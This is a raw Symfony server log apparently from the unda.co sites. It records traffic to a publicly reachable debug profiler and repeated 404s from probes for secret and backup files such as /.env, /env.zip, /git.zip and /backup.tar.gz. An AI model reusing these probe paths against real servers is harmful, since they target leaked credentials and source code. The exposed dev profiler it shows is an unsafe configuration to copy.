[2025-12-18 01:27:08] request.INFO: Matched route "_profiler_exception". {"route":"_profiler_exception","route_parameters":{"_controller":"web_profiler.controller.exception:showAction","token":"52b0f2","_route":"_profiler_exception"},"request_uri":"https://www.unda.co/_profiler/52b0f2/exception","method":"GET"} []
[2025-12-18 01:27:09] php.CRITICAL: Call to a member function getCollector() on null {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
[2025-12-18 01:27:09] request.CRITICAL: Uncaught PHP Exception Symfony\Component\Debug\Exception\FatalThrowableError: "Call to a member function getCollector() on null" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php line 61 {"exception":"[object] (Symfony\\Component\\Debug\\Exception\\FatalThrowableError(code: 0): Call to a member function getCollector() on null at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Bundle/WebProfilerBundle/Controller/ExceptionController.php:61)"} []
[2025-12-18 01:31:38] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c2eb9b","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/c2eb9b?panel=time","method":"GET"} []
[2025-12-18 01:31:38] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=time","method":"GET"} []
[2025-12-18 01:38:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 01:39:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f4dabc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f4dabc?panel=logger","method":"GET"} []
[2025-12-18 01:39:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
[2025-12-18 01:44:03] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
[2025-12-18 01:46:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=cache","method":"GET"} []
[2025-12-18 01:46:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 01:49:53] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5f0320","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5f0320","method":"GET"} []
[2025-12-18 01:49:53] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
[2025-12-18 01:51:03] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 01:51:05] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"POST"} []
[2025-12-18 02:07:29] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 02:11:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"ed1483","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/ed1483?group=1&panel=db","method":"GET"} []
[2025-12-18 02:11:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?group=1&panel=db","method":"GET"} []
[2025-12-18 02:15:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?panel=exception","method":"GET"} []
[2025-12-18 02:15:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
[2025-12-18 02:18:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=dump","method":"GET"} []
[2025-12-18 02:18:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
[2025-12-18 02:18:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"55fc44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/55fc44?panel=twig","method":"GET"} []
[2025-12-18 02:18:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
[2025-12-18 02:33:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=security","method":"GET"} []
[2025-12-18 02:33:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-18 02:35:59] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 02:37:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0f40a7","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0f40a7?panel=cache","method":"GET"} []
[2025-12-18 02:37:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
[2025-12-18 02:41:33] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=request","method":"GET"} []
[2025-12-18 02:41:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-18 02:43:35] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 02:43:56] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 02:44:10] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
[2025-12-18 02:44:24] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /WuEL"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /WuEL\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 02:44:54] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /a"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /a\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 02:45:45] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /download/file.ext"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /download/file.ext\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 02:48:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /SiteLoader"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /SiteLoader\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 02:56:42] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"2b8781","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/2b8781/search/results?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-18 02:56:43] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.83.228&limit=10&method=GET","method":"GET"} []
[2025-12-18 03:00:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c98e4d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c98e4d?panel=db","method":"GET"} []
[2025-12-18 03:00:02] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 03:02:53] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /ReportServer"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /ReportServer\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:08:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"533e9e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/533e9e?panel=config","method":"GET"} []
[2025-12-18 03:08:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:10:31] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:13:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b37bf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b37bf1?panel=db","method":"GET"} []
[2025-12-18 03:13:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
[2025-12-18 03:14:16] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:16:22] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backend.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backend.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app/app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app/app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /api.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /api.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /env.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /env.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.tar.gz"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.tar.gz\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /home.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /home.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /app.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /app.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /backup.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /backup.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:19:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /git.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /git.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-18 03:23:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-18 03:23:17] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:24:09] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:24:29] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"d7d5e3","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/d7d5e3","method":"GET"} []
[2025-12-18 03:24:34] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:24:36] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
[2025-12-18 03:25:05] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"c59887","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/c59887","method":"GET"} []
[2025-12-18 03:25:06] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"e4fc6d","_route":"_wdt"},"request_uri":"https://unda.co/_wdt/e4fc6d","method":"GET"} []
